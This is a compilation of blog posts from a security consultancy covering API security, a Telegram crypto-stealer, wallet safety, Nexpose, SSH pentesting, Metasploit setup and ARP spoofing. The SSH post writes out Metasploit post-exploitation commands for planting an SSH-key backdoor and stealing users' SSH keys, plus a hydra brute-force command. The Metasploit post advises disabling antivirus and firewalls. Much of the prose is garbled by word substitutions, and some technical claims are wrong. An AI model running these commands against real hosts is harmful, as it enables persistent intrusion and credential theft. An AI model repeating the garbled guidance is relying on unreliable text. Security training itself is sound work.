Airzero Sec

We Do Not Give Up ! Trust US !

Ethical Hacking

Ethical hacking involves an authorized attempt to gain unauthorized access to a computer system, application, or data. Carrying out an ethical hack involves duplicating strategies and actions of malicious attackers.

A tool for simulating OWASP API Top 10 vulnerabilities and observing their behavior has been released to the open-source community.

The vAPI, or 'Vulnerable Adversely Programmed Interface,' is a vulnerability exercise and test platform designed to help users learn about API security.

API security has emerged as a critical area of concern in recent years. APIs are now widely used to manage services and data transfers, and a single broken endpoint can result in data breaches or enterprise network compromises.

According to Gartner, API attacks will become the most common attack vector for enterprise web applications this year.

Vulnerable APIs

vAPI is an open-source PHP-based interface developed by Tushar Kulkarni, a security engineer at Holm Security, and is available on GitHub. It can be used as a self-hosted API via PHP, MySQL, and PostMan, or as a Docker image. Kulkarni stated during the platform's introduction at Black Hat Europe 2021 Arsenal that vAPI could be useful to new penetration testers in acclimating them to how different API bugs are classified, as well as for developers, as the platform allows them to see examples of vulnerable code – as well as consider potential mitigations.

The Laravel PHP framework and MySQL are at the heart of the platform's technology stack. Although Postman collection and Environment are used to store API calls, this will eventually change due to migration to an OpenAPI. A manipulator-in-the-middle (MitM) proxy, such as Burp Suite or ZAP, can be used for testing, though the developer does not consider it strictly necessary. "Some API vulnerabilities, such as credential stuffing, may require you to run as an intruder or a ZAP script to solve the challenge," Kulkarni explained.

OWASP API Top 10

In 2019, the Open Web Application Security Project (OWASP) Foundation published its first API Security Top 10 list, which documents the most common API-related causes of security incidents, reflecting the growing importance of API security.

vAPI is currently based on the API categorizations found in the OWASP API Security Top 10.

The following causes are documented in OWASP's 2019 list:

  • API1:2019 Faulty Object Level Authorization: exposed endpoints handling object identifiers
  • API2:2019 Faulty User Authentication: failures to manage authentication correctly
  • API3:2019 Excessive Data Exposure: Object property exposures are included.
  • API4:2019 Lack of Resources and Rate Limiting: There are no limits on resource sizes or numbers, potentially degrading performance and allowing brute-force attacks.
  • API5:2019 Failed Function Level Authorization: Inadequate Access Control Management
  • API6:2019 Mass Assignment: Filter failures that enable malicious object modification
  • API7:2019 Security Misconfiguration: Default configurations, errors, and cross-origin resource sharing permissive
  • Injection flaws in API8:2019 include SQL, NoSQL, and command injection flaws.
  • API9:2019 Inadequate Asset Management
  • API10:2019: Inadequate Logging and Monitoring

The platform is now open to the public and free to use. The vAPI roadmap includes the development of a dashboard to track user progress through the API challenges, and Kulkarni hopes that in the long run, the platform will become an "open-source playground" for users to submit their own API security challenges and scenarios. If you have any doubts about the aforementioned topic, please contact us. Please do not hesitate to get in touch with us. Your digital partner will be Airzero sec.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

According to researchers, attackers are spreading the harmful Echelon info stealer, which steals credentials for cryptocurrencies and other user accounts, using the Telegram handle "Smokes Night."

Attackers are employing the Echelon info stealer to target Telegram users' crypto-wallets in an attempt to swindle new or naïve users of a cryptocurrency discussion channel on the messaging network, according to researchers.

According to an inquiry posted on Thursday, researchers from SafeGuard Cyber's Division Seven hazard analysis section identified a sample of Echelon in a cryptocurrency-focused Telegram chat in October.

The malware used in the campaign is set to rob certificates from a variety of messaging and file-sharing platforms, such as Discord, Edge, FileZilla, OpenVPN, Outlook, and even Telegram itself, as well as cryptocurrency wallets, such as AtomicWallet, BitcoinCore, and ByteCoin.

The effort was a "spray and pray" operation, according to the report: "Based on the malware and the way in which it was released, SafeGuard Cyber believes it was not part of a coordinated campaign and was merely targeting new or inexperienced users of the channel."

Researchers decided that assailants tried to spread Echelon on the channel utilizing the handle "Smokes Night," although it's unclear how effective they were.

"The post seemed not to be a reaction to any of the surrounding posts in the channel," they stated.

Other users on the track, they assert, did not seem to detect anything strange or respond to the message. According to the researchers, this does not mean that the malware did not reach consumers' devices.

"We did not notice anyone answer to 'Smoke Night' or whine about the file," they said, "but this does not rule out the possibility that channel members were infected."

Cybercriminals have taken advantage of Telegram's popularity and large attack surface by distributing malware on the platform via bots, rogue accounts, and other methods.

Malware Analysis

The Echelon credential thief was furnished to the cryptocurrency channel via a.RAR file called "present).rar," which contained three files: "pass – 123.txt," a benign text document containing a password; "DotNetZip.dll," a non-hostile type library and toolset for manipulating.ZIP files; and "Present.exe," the malicious executable for the Echelon credential stealer.

The.NET payload also contains obfuscation utilizing the open-source ConfuserEx program, as well as two anti-debugging capabilities that promptly terminate the process if a debugger or other malware analysis tools are identified.

Researchers were able to decode the code and look inside the Echelon sample that was sent to Telegram channel subscribers. According to the researchers, they identified domain detection, which implies the sample would try to steal data from any domain that the victim has visited. A detailed list of platforms that the Echelon sample attempted to target is included in the report.

Other aspects of the malware, according to the researchers, include computer fingerprinting and the ability to take a screenshot of the victim's workstation. According to the researchers, the Echelon model used in the campaign transmits credentials, other stolen data, and screenshots back to a command-and-control server through a compressed.ZIP file.

According to the researchers, Windows Defender detects and deletes the Present.exe malicious executable sample and flags it as '#LowFI: HookwowLow,' protecting users who have the antivirus program from any potential Echelon damage.

For years, Airzero Sec's Cyber Security Consulting experts have worked on a variety of projects for a number of well-known organizations. Use our previous experience to your advantage, whether it's to help you get there or to perform technical tests. If you have any doubts about telegram being used to steal passwords of bitcoin wallets, please contact us. Airzero sec will be your digital partner.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Are NFTs Safe Digital Assets?

- Posted in Ethical Hacking by

What Is a Non-Fungible Token?

Non-fungible tokens or NFTs are cryptographic support on the blockchain with unique title codes and metadata that differentiate them from each other. Unlike cryptocurrencies, they cannot be sold or traded at correspondence. This varies from fungible tokens like cryptocurrencies, which are similar to each other and, therefore, can be used as a medium for commercial transactions.

Are NFTs safe digital assets?

What is an NFT and why is this evolving a big value in the news? NFTs, or non-fungible tokens, are cryptographic permits that let someone confirm that an online asset is authentic. 2020 was a big year for the crypto world and the topic of decentralized finance has only increased in popularity, with the likes of Tesla purchasing large quantities of cryptocurrency and Bitcoin reaching all-time highs. NFT’s conducted a steady uptick in favour and use since the end of 2020 and in some cases, have sold for millions of dollars.

Cryptocurrencies such as Bitcoin are known as ‘fungible’ tokens because tokens are convertible and not uncommon. This means that if you were to trade one Bitcoin for another, you’re basically getting the same thing. There is nothing special about each coin. In distinction, non-fungible tokens convey something special that can’t be returned. Like trading or selling an actual illustration that can be confirmed as authentic, an NFT can be forged onto, as an example, an actual GIF or photograph as proof that that thing is initial. In other words, an NFT is a cryptographic token that permits someone to prove that an online asset is the original. This in turn creates scarcity, which in theory creates value, even in the digital space where things are not tangible.

How to keep your NFTs secure?

Considering the conceivable value of NFTs inherently gets up the topic of securing these digital assets. Are they safe to utilize? In general, accepting and acknowledging NFTs are as secure as purchasing and holding cryptocurrency. But, while the technology after NFTs is thought of as being safe, there is still something you like to do to ensure your investment is safe. Here are suggestions for keeping NFTs safe:

  • Use a complex password: Do you discover yourself using the same password for different accounts? Stop doing that! A lengthy, amazing, complex password is a must for your wallet. Pro tip: this guidance should be taken for every budget you have.
  • Enable two-factor authentication: As with your cryptocurrency wallet, two-factor authentication goes a lengthy way. By requiring verification before fulfilling actions, the probability of an NFT being stolen or accidentally sent to someone becomes a lot less likely.
  • Keep your recovery phrase in a secure place: In the event, you renounce your password, your passphrase is your last resort in recovering your account. Make sure that your passphrase is not readily guessable by using a mnemonic phrase and make sure that you keep this in a safe location. If you lose your recovery phase,recovering your account is almost impossible.
  • Back up your wallet regularly: In the event, you encounter a system loss or lose a device, you can have the ease of mind that you can retrieve your data. It is a good idea to have numerous backups.
  • Update your software regularly: Software updates contain security fixes.
  • Use a secure internet connection: Using shared wifi makes it more comfortable for an attacker to swipe your details. If you require to use public wifi, use a VPN to ensure your association and turn off your device’s Bluetooth connection.

In addition to these steps, one last thing to comprehend is your legal requests as they pertain to your NFTs. Though NFTs confirm that a typical piece of data is amazing, they do not stop someone from tokenizing something that is not theirs. Fortunately, there are lawful protections you have access to. Standard copyright law may be used by NFTs. If, for example, you acknowledge your digital art was being pinched, you could file a takedown notice against the platform selling and creators of these NFTs using the Digital Millennium Copyright Act.

Coindesk also suggests that one specifies what you are giving to buyers. If you own the rights to a job you’re marketing, are you the proprietor of the underlying art or just the digital representation? In other words, when feasible or just be specific on the front end by structuring your smart contract to specify the rights being transferred.

If you have any doubt about how to keep NFTs secure. Don’t hesitate to contact us through the given email. Airzero sec will be your digital partner.

Email:[email protected] enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Bitcoin is on a different rollercoaster journey. Over the preceding few months, the cryptocurrency's benefit spiked from $3,000 to over $13,000; at this writing, it reaches near $10,000.

Such conditions prompt people to buy bitcoins with the expectation of coming out ahead. But Bitcoin's growing price also draws wicked hackers who see an opening to take the supplies of unwary users who don't know the basics of Bitcoin defence.

If you're current with Bitcoin, these suggestions will help you preserve your digital fortune.

Protect Your Online Wallet

The most natural way to get commenced with Bitcoin and other popular cryptocurrencies are to sign up with an online wallet such as Coinbase or Binance. Online wallets hide several of Bitcoin's technical difficulties, such as managing private keys and numbers, so they're an engaging option for people who are small tech-savvy or new to Bitcoin. Signing up for the largest online wallets takes no more than a few minutes, and entering your account needs only a browser, username, and password.

Online wallets, however, are not the most reliable place to store your cryptocurrencies. Anyone with your email and password can enter and steal your coins, and bad actors can achieve this with something as easy as a phishing email. Also, unlike with popular payment systems, improving lost bitcoins is practically impossible.

Here are a few best methods that can increase your wallet's security:

Enable Two-Factor Authentication (2FA)

Most online wallets support some form of two-factor or multi-factor authentication. Authorizing 2FA links your statement to a phone, mobile app, or physical dongle. If a wicked hacker gets your username and password, they'll still require to have that special factor to reach your account.

Don't Use Your Phone Number for 2FA

Most sites promote various forms of two-factor authentication, but not all 2FA systems are fairly reliable. If you rely on SMS passcodes to ensure your account, cunning hackers will be ready to hijack your phone number and prevent your 2FA passcode. If you're connecting a phone number with your account, it would be best to use a separate, hidden SIM card.

Use a Separate Email for Your Bitcoin Wallet

Most of us have a fundamental account for our daily interactions—but we use the same email address for our Facebook, Twitter, and PayPal accounts. We experience it with friends, family features, and coworkers. They might participate with other characters, and finally, a wicked hacker might get it. If your online wallet is tied to this email, the hacker has one of two important parts of data required to enter your wallet. Use a separate email address for your online wallet—one you don't use for any other purpose. This minimizes the chance of your account being created by a cybercriminal.

Use an Offline Wallet

Every Bitcoin wallet has one or more "addresses" where it collects its cryptocurrency. Bitcoin positions are long, different strings of alphanumeric characters, and each home has a pair of private and public encryption keys. When other users need to transfer bitcoins to your address, they use your public key. When you need to spend your bitcoins, you use the private key to sign your business. The private key shows you have ownership of the bitcoins deposited in a specific address. Therefore, the key to obtaining bitcoins is to keep your private key in a secure place.

By using an online wallet, you're definitely letting the service provider secure your private keys for you. That's why it's so simple to use online wallets. But it also makes online transactions an engaging target for hackers. Although these organizations do their most useful to guard user accounts, they get breached pretty often.

An option to online Bitcoin transactions is offline wallets, which give you full control of your private keys and will defend you against mass data breaches at Bitcoin transactions. The trade-off is they're more complicated to set up and use, and they need more technical knowledge. Offline wallets come in several flavours:

Software Wallets

Software wallets are applications you can install on your machine, portable concept or mobile device. A wallet app, such as Electrum, collects private keys on your machine and uses them to sign Bitcoin deals whenever you need to make a payment. If you need an entire warranty with a software wallet, you must place it on a machine that isn't related to the internet and give signed deals to an internet-connected machine. The method is more complicated but also more secure.

Hardware Wallets

Hardware wallets are dynamic devices that create and save cryptocurrency key pairs. They normally come with an associated app you must place on your computer or your mobile device. When you need to transfer bitcoins to someone, you have to join the hardware wallet to your computer or pair it with your phone via Bluetooth. Every business is engaged on the hardware wallet with the consent of the user. Hardware wallets are very defended because the private keys never leave the device; Trezor and Ledger are two options.

Paper Wallets

Paper wallets are Bitcoin key pairs marked as QR codes on paper. You can generate paper wallets at one of the various websites such as bitcoinpaperwallet.com. To earn money in your paper wallet, consider the public key with any Bitcoin wallet app and give it to the payer. To send bitcoins from your paper wallet, consider your private key to sign your business.

Paper wallets are "cold storage," which implies they're great for securely collecting bitcoins but not very helpful for making day-to-day payments. Paper wallets are safe because they have no digital element and they can't be stolen or hacked remotely. But you must stop the digital copy of the container after you print it, to make sure no one else replicates it.

Using an offline wallet doesn't mean your bitcoins are completely safe. If you give your private keys in an unsecured place, the opposite person might chance upon them. Also, you might unintentionally damage your keys, which will also appear in spending your funds without support. For instance, if you fail or damage your hardware or paper wallet or ignore your security PIN, your bitcoins will be missed forever.

If you have any doubt about how to keep your bitcoin safe don’t hesitate to contact us through the given email. Airzero sec will be your digital solution.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

In this blog, we’ll discover Nexpose, which is related to scanning a vulnerability network. There are different vulnerability scanners but the part that holds it special is its smooth user interface and robust reporting possibilities it offers, from the most common to the advanced.

Introduction to Nexpose

Nexpose is one of the best vulnerability evaluation tools. It works across physical, virtual, cloud and mobile settings to discover the current services, open ports, and running forms on each device, and it works to identify vulnerabilities that may exist based on the characteristics of the known duties and applications. Though Nexpose reveals the results into scan reports, which supports prioritizing the vulnerabilities based on the risk factor and determining the most efficient solution to be completed.

Which are the Important Nexpose terminologies?

  • Assets – A host on a network
  • Site – A reasonable group of assets that has a dedicated scan generator
  • Scan Template – A template that describes the audit level that Nexpose uses to perform a vulnerability scan.
  • Local Scan Engine – Scan Engines are accountable for performing scan jobs on your assets.

How do we install Nexpose Virtual Appliance?

Let’s begin the Nexpose installation over our Virtual Machine. From here we’ve downloaded the Nexpose VM. Firstly, we’ll continue Nexpose in our VMware Workstation and power it ON. As quickly as it boots up, we’ll see our failure login credentials – Username and Password. Furthermore, we have to set a new password according to the conditions.

Afterward, use the ifconfig power in your Nexpose to check our organization’s IP address so that we can log into the Nexpose’s web interface.

Now provided with the IP we need to set the HTTPS and port 3780 is the Nexpose’s default port.

URL : https://<Nexpose_IP>:3780

Though we’ll be welcomed with a notice about a Security Certificate, therefore, to use Nexpose, we’ll have to get over this information. Click on Advanced, resulting in Accept the Risk and Continue.

You will then be redirected to a login page, given the default username and password.

Further, you’ll be asked for an activation Key, providing the license key that you’ve experienced at your email address.

As soon as you’ve logged in and created all the necessary activations, the Nexpose Security Web Console page will begin and we’ll be ready to fulfill any scan.

How do we Run Vulnerability Scans?

In series to begin with a new scan, go to the home page, tick the Create dropdown, and select Site. The Security Console will present the “Site Configuration” screen.

On the General tab, we have to give the title and describe our site. We can also set its attention from Very Low to Very High.

The Assets configuration page contains two sections: Include and Exclude. In the Authentication section, if we require to put any credentials, we can do that here. Basically, we handle a credential-based scan by implementing the method with a username and a password.

Afterward, set up a particular Scan Template, we’ve applied the default Scan Template i.e. full Audit without Web Spider.

So now we have to choose an engine for our scan, although we’re choosing the Local Scan Engine. Now since we’ve created all the necessary knowledge to set up our site for a scan. To start scanning, press the Save and Scan button at the top right corner of our Nexpose console panel.

Once the scan is finished, the result simply means the number of possessed vulnerabilities, the risk score, and the continuation of the scan.

How do we Generate Reports?

Now we can create the new records in the Reports tab by completely giving it a title, choosing the scan along with the template and the arrangement in which we require our reports to be.

If you have any doubts about the Nexpose installation and services don't hesitate to contact us through the below email. Airzero Sec will be your digital partner. Email id: [email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

Examining through every open port is essentially the first step hackers take in order to prepare for their attack. And in order to operate, one is expected to keep their port open but at the same time, they are intimidated by the fear of hackers. Therefore, one must learn to defend their ports even if they are open. In this post, we will consider penetration testing of SSH which is also recognized as Secure Shell.

The SSH protocol also declared as Secure Shell is a procedure for safe and reliable antique login from one computer to another. It allows various options for strong authentication, as it preserves the connections and communications and integrity with secure encryption. It is a protected alternative to the non-protected login protocols and insecure file transfer systems.

How do we install SSH?

It is very simple to install and configure ssh service, we can quickly install ssh set by using the OpenSSH-server package from the ubuntu repo. To install any help you must have a root right account and then follow the given below command.

apt install OpenSSH-server

When you do the above command it will remove the package the install the error configure on the host organization.

How do we do SSH port scanning?

If you don’t have a direct way to the host device, use Nmap to remotely recognize the port state that is estimated to be the primary step of the penetration test. Here we’re working to use Kali Linux to conduct penetration testing.

So, to recognize an open port on a remote network, we will use a variant scan of the map that will not only recognize an open port but will also complete a banner grabbing that displays the connected version of the service.

nmap -sV -p22 192.168.1.103

What are the methods to connect SSH?

Terminal Command (Linux) Now complete the next command to enter the ssh shell of the remote device as an approved user. Username: ignite Password: 123

ssh [email protected]

Putty (Windows)

  • Step 1: Connect putty.exe and operate it, then start the HOST IP address <192.168.1.103> and port <22>, also want to connect type as SSH.
  • Step 2: To establish an association between the client and the server, a putty gathering will be created that needs a login credential. Username: ignite Password: 123 How to do port redirection testing?

Thus, if we have worked the scan on port 22, it has given port state CLOSE for ssh whereas port 2222 OPEN for ssh which can be seen .

How to establish an SSH connection using an RSA key?

Safe passwords don’t seem to be nice to obtain from the server because a brute power attack can break them. That’s why you need an additional protection method to defend the SSH server.SSH key pairs are another important feature to confirm clients to the server. It consists of a long string of figures:

a public and a private key. You can put the public key on the server and the private key on the client device and unlock the server by comparing the private key of the client engine. Once the keys match up, the system allows you to automatically build an SSH session without the requirement to type in a password.

Ssh-keygen is a tool for generating new authentication key pairs for SSH. The before-mentioned key pairs are used for automating logins, single sign-on, and for verifying hosts. Thus, we will follow the steps for generating a key pair for a confirmed connection.

  • Step 1: Move the given command to create an ssh key pair on the host device Ubuntu.

    Ssh-keygen

  • Step 2: Equal should be done on the client device which is allowed to build the relationship with the host device.

  • Step 3: Once the ssh key pair gets created then rename the id_rsa.pub into authorized_keys.

    ssh-keygen cd .ssh ls cat id_rsa.pub > authorized_keys

  • Step 4: Give the authorized_keys to the host device by making it into the .ssh directory.

  • Step 5: Correct the sshd_config from inside the /etc/sshd using the editor.

    nano /etc/ssh/sshd_config

  • Step 6: Make the “password authentication no” comment As a consequence of only the authorized movement, the RSA key can create an association with the host machine without using the password.

Now if you require it to equate to the ssh server using your password username, the server will release your connection offer because it will authenticate the request that has an authorized key.

  • Step 7: Follow the id_rsa key from Kali Linux to the windows device, to build an association using authorized_keys on the windows machine.

  • Step 8: Connect puttygen.exe

  • Step 9: Run puttygen.exe and place the id_rsa and “save as key” described as Key

  • Step 10: Use putty.exe to combine with the host device by starting hostname 192.168.1.103 and port 22.

  • Step 11: Drive to SSH >auth and peruse the private key that you have collected as mentioned in step 9.

How to exploit SSH with Metasploit?

SSH Key Persistence- Post Exploitation:
Suppose a situation, that by agreeing on the host device you have received a meterpreter gathering and need to leave a strong backdoor that will give a backward attachment for next time.

This can be accomplished with the guidance of the Metasploit module called “SSH Key Persistence-a post exploit” when port 22 is working on the host device. This module will continue an SSH key to a designated user, to allow past login on the victim via SSH at any point.

use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) >exploit

As we guarantee this by joining the host device via port 22 using a private key created above. Here I have renamed the private as “key” and gave support600.

chmod 600 key
ssh -i key [email protected]

Stealing the SSH key

Suppose a place, that by agreeing on the host device you have received a meterpreter assembly and port 22 is open for ssh and you require to have SSH public key and authorized key. This can be done with the direction Metasploit module named “Multi Gather OpenSSH PKI Credentials Collection -a post exploit” as shown below.

This module will get the contents of all user’s .ssh directories on the targeted device. Additionally, known_hosts and authorized_keys and other files are also downloaded. This module is mainly based on firefox_creds.RB.

use post/multi/gather/ssh_creds
msf post(ssh_creds) >set session 1
msf post(ssh_creds) >exploit

authorized keys stored in the/home/ignite/.ssh folder in our local device at /root/.msf4/loot and now use those keys for login into an SSH server.

As we ensure this by connecting the host device via port 22 using the private key downloaded above. Let’s change the support for the RSA key and to do this follow the step given below.

chmod 600 key
ssh -i key [email protected]

SSH login using pubkey

Thinking you have the id_rsa key of the host device and want to obtain a meterpreter assembly via Metasploit and this can be accomplished with the guidance of the subsequent module.

This module will test ssh logins on a spectrum of devices using a defined private key file and report thriving logins. If you have placed a database plugin and compared it to a database this module will record strong logins and hosts so you can track your path. Key files may be a separate private key or individual private keys in a particular directory.

use auxillary/scanner/ssh /ssh_login_pubkey
auxiliary (scanner/ssh /ssh_login_pubkey)>set rhosts 192.168.1.103
auxiliary (scanner/ssh /ssh_login_pubkey)>set username ignite
auxiliary (scanner/ssh /ssh_login_pubkey)>set key_path /root/.ssh/id_rsa
auxiliary (scanner/ssh /ssh_login_pubkey)>exploit

This will open a commanded assembly which can be extra updated into the meterpreter assembly by doing the next command.

sessions -u 1

How do we do SSH password cracking?

We can examine a brute force attack on ssh for suggesting the password or to test the entrance policy while performing entrance testing on SSH. It needs a dictionary for username list and password list, here we have username reference“user.txt” and password account named “pass.txt” to create the brute force approach with the help of hydra

hydra -L user.txt -P pass.txt 192.168.1.103 ssh

As a result, you can recognize that the host device has no protection against brute force attack, and we were able to obtain ssh importance.

To preserve your aid against brute force drive you can use fail2ban which is an IPS.

If you have any doubts about this topic or have to get advice and get the best services and consultation about SSH installation and its ability. Feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

Rapid7 produces open-source installers for the Metasploit Frame on Linux, Windows, and OS X operating systems. The Metasploit installer ships with all the required provinces to run the Metasploit Framework. It covers msfconsole and enables associated accessories like John the Ripper and Nmap.

How to disable antivirus software?

Anti-virus software discovers the Metasploit Framework as wicked and may cause problems with the installation and runtime of Metasploit Framework. The Metasploit Framework utilizes the same vulnerabilities that the anti-virus software recognizes. Therefore, when you connect the Metasploit Framework, the anti-virus software obstructs the installation process and informs you of the defence risks that may infect the system.

If you plan to practice the Metasploit Framework, you should damage any anti-virus software before you place Metasploit Framework. If you cannot impair the anti-virus software, you must add the Metasploit directory from the scan.

How to disable firewalls?

Local firewalls, add Windows Firewall, conflict with the development of ventures and payloads. If you install the Metasploit Framework from after a firewall, the firewall may calculate the Metasploit Framework as malware and prevent the download. Please impair the local firewalls before you install or run Metasploit Framework. If you must move from behind a firewall, you should download the Metasploit Framework from the external network.

How to obtain administrator privileges?

To place the Metasploit Framework, you need to have administrator rights on the system that you need to use to cover the framework.

How to install the Metasploit framework on windows?

  • Download the Windows installer.
  • After you download the installer, settle the file and increase-click the installer icon to begin the installation method.
  • When the Setup screen appears
  • Select Next to continue.
  • Know the consent agreement and choose the receive the license agreement choice. select Next to continue.
  • Browse the area where you need to install the Metasploit Framework. By want, the framework is installed on the C:\ Metasploit-framework folder. Select Next to continue.
  • select Install.
  • The installation method can take 5-10 minutes to finish. When the installation finishes, click the Finish button.
  • To begin msfconsole after the installation completes, run the below from the command line:

    $ msfconsole.bat

How to install the Metasploit framework on Linux?

  • Open the terminal.
  • Type the command to add the build repository and enable the Metasploit Framework package:

    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

  • After the installation finishes, open a terminal window and type the below to start msfconsole:

    $ ./msfconsole

  • The prompt tells you if you need to use and set up a new database. Type y or yes to run the first configuration script to build the initial database.

  • If all goes well, the console begins and shows the following:

    Creating database at /Users/joesmith/.msf4/db
    Starting Postgresql
    Creating database users
    Creating initial database schema
    ** Metasploit Framework Initial Setup Complete **
    [*] Starting the Metasploit Framework console...-[*] The initial module cache will be built in the background, this can take 2-5 minutes...
    /
    Metasploit Park, System Security Interface
    Version 4.0.5, Alpha E
    Ready...
    > access security
    access: PERMISSION DENIED.
    > access main security grid
    access: PERMISSION DENIED....and...
    YOU DIDN'T SAY THE MAGIC WORD!
    YOU DIDN'T SAY THE MAGIC WORD!
    =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
    + -- --=[ 1454 exploits - 827 auxiliary - 229 post ]
    + -- --=[ 376 payloads - 37 encoders - 8 nops ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    msf >

  • To check to see if the database was the build-up, execute the below command:

    $ db_status

  • If the Metasploit Framework is successfully merged to the database, the below status displays:

    [*] postgresql connected to msf

How to install the Metasploit framework on OSX?

  • Download the OSX package.
  • After you enable the package, identify the file and double-click the installer icon to begin the installation process.
  • When the Welcome screen appears, select Continue.
  • Go through the license agreement and select Continue.
  • Agree to the license agreement to make with the download process.
  • Browse to the area where you need to install the Metasploit Framework if you need to change the default installation location.
  • Select Install when you are ready to download the Metasploit Framework.
  • The installation process can take 5-10 minutes to finish.
  • When the installation finishes, select the Close button.
  • To enable and begin the database, execute the following command:

    $ msfdb init

If you have any doubts about this topic or have to get advice and get the best services and consultation about metasploit framework . Feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

Address Resolution Protocol (ARP) poisoning is a seizure that involves conveying spoofed ARP communications over a local area network. It’s also identified as ARP spoofing, ARP poison routing and ARP cache poisoning. These interventions strive to redirect transactions from their originally designated host to an attacker instead. ARP poisoning does this by comparing the attacker’s Media Access Control (MAC) address with the IP address of the destination. It only works against arrangements that use ARP.

ARP poisoning is a kind of man-in-the-middle attack that can be used to stop network traffic, improve it, or intercept it. The procedure is often used to launch further invasions, such as session hijacking or denial-of-service. Before you can know what ARP poisoning is, it’s essential to have a piece of solid knowledge of the ARP protocol. Before we can speak about the ARP protocol, we require to back up just a tiny bit further and discuss the Internet protocol suite.

What is the internet protocol suite?

When you start up the web browser on your phone, the memes and cat photographs are addressed to you almost immediately and with little work, making the process seem easy.

It can appear as if your phone and the server that hosts the cat pictures are related like two cups on a string, and that like two children playing telephone, the cat photo just travels along some wires and seems on your phone like the sound of a voice over the string. Given the currency of wifi and data these days, it may even appear like the cat picture anyhow moves across the ether.

Of course, this isn’t the problem. The cat picture’s journey is actually pretty complex, driving across a multi-layered system that is best approximated with the Internet protocol suite model:

  • The application layer:
    At the application layer, neither you, your web browser nor the server software are very conscious of how the cat picture got brought to you. You don’t know how many routers the data for the cat design went through, or whether it travelled over wireless attachments. All you know is that you agreed on a link and that the cat picture came to you.
  • The transport layer:
    With the transport layer, we get below the hood a small bit. The transport layer is accountable for establishing a relationship between the client and the server that hosts the website. The transport layer retains an eye on the attachment and looks for typos, but it doesn’t worry about how the data is moved between the client and the server.
  • The internet layer:
    Internet layer software is useful for moving data between the networks. It doesn’t bother about the cat picture’s data and handles it the identical as it would treat data for an ebook about chemistry. Once the internet layer software makes the cat picture data to your local network, it hands it off to the link-layer software.
  • The link-layer:
    Link layer software moves both ingoing and friendly data within your local network. It uses the data for the cat picture from the internet layer software and passes them to your device.

Each of the higher layers can have a collection of different protocols running for them to complete their jobs. This combination of a system somehow runs cohesively to bring the cat picture from the server to your phone’s screen. What is the address resolution protocol?

The address resolution protocol (ARP) is just one of these protocols. It’s used to determine which link-layer address, such as a MAC address, answers with a given internet layer address for a real machine. These are usually IPv4 addresses.

Since IPV4 is still the most generally used internet protocol, ARP usually bridges the gap between 32-bit IPv4 addresses and 48-bit MAC addresses. It goes in both areas.

The association between a given MAC address and its IP address is stored in a table identified as the ARP cache. When a packet heading towards a host a LAN gets to the gateway, the gateway uses ARP to join the MAC or physical host address with its correlating IP address.

The host then combs through its ARP cache. If it determines a similar address, the address is used to change the format and packet length. If the right address isn’t seen, ARP will carry out a request packet that requires other machines on the local network if they understand the exact address. If a machine responds with the address, the ARP cache is refreshed in case there are any future questions from the same origin.

What is ARP spoofing?

Now that you know more about the underlying protocol, we can cover ARP poisoning in more intensity. The ARP protocol was revealed to be productive, which led to a severe lack of security in its purpose. This gives it comparatively easy for someone to fix these attacks, as long as they can reach the local network of their purpose. ARP poisoning includes shipping forged ARP reply packets to a gateway over the local network. Attackers typically use kidding tools like Arpspoof or Arppoison to make the task manageable. They set the IP address of the tool to meet the address of their destination. The tool then scans the purpose LAN for the IP and MAC addresses of its hosts. Once the criminal has the addresses of the hosts, they begin sending forged ARP packages over the local network to the hosts. The fraudulent information tells the objects that the attacker’s MAC address should be related to the IP address of the device they are targeting.

This appears in the recipients renewing their ARP cache with the attacker’s location. When the recipients interact with the purpose in the future, their messages will really be sent to the attacker instead.

At this point, the attacker is quietly in the center of the communications and can leverage this situation to read the traffic and keep data. The attacker can also alter information before they get to the destination, or even stop the connections perfectly.

How to detect ARP spoofing?

ARP poisoning can be identified in diverse several ways. You can use Windows’ Command Prompt, a free-source packet analyzer such as Wireshark, or exclusive options such as XArp.

Command prompt

If you assume you may be experiencing an ARP poisoning charge, you can stay in Command Prompt. First, open Command Prompt as an executive. The most simple way is to press the Windows key to open the start menu. Class in “cmd”, then hold Crtl, Shift and Enter at the very time. This will bring up Command Prompt, although you may have to agree Yes to give the app support to make changes. In the command line, open:

arp -a

The table displays the IP addresses in the left column, and MAC addresses in the center. If the table includes two different IP addresses that accord the same MAC address, then you are apparently undergoing an ARP poisoning attack.

As an example, let’s say that your ARP table includes a number of diverse addresses. When you scan through it, you may see that two of the IP addresses have the corresponding physical address. You might see something like this in your ARP table if you are really being abolished:

Internet Address Physical Address 192.168.0.1 00-17-31-dc-39-ab 192.168.0.105 40-d4-48-cr-29-b2 192.168.0.106 00-17-31-dc-39-ab

As you can see, both the front and the third MAC addresses the event. This means that that the purchaser of the 192.168.0.106 IP address is most possible the attacker.

How to prevent ARP spoofing?

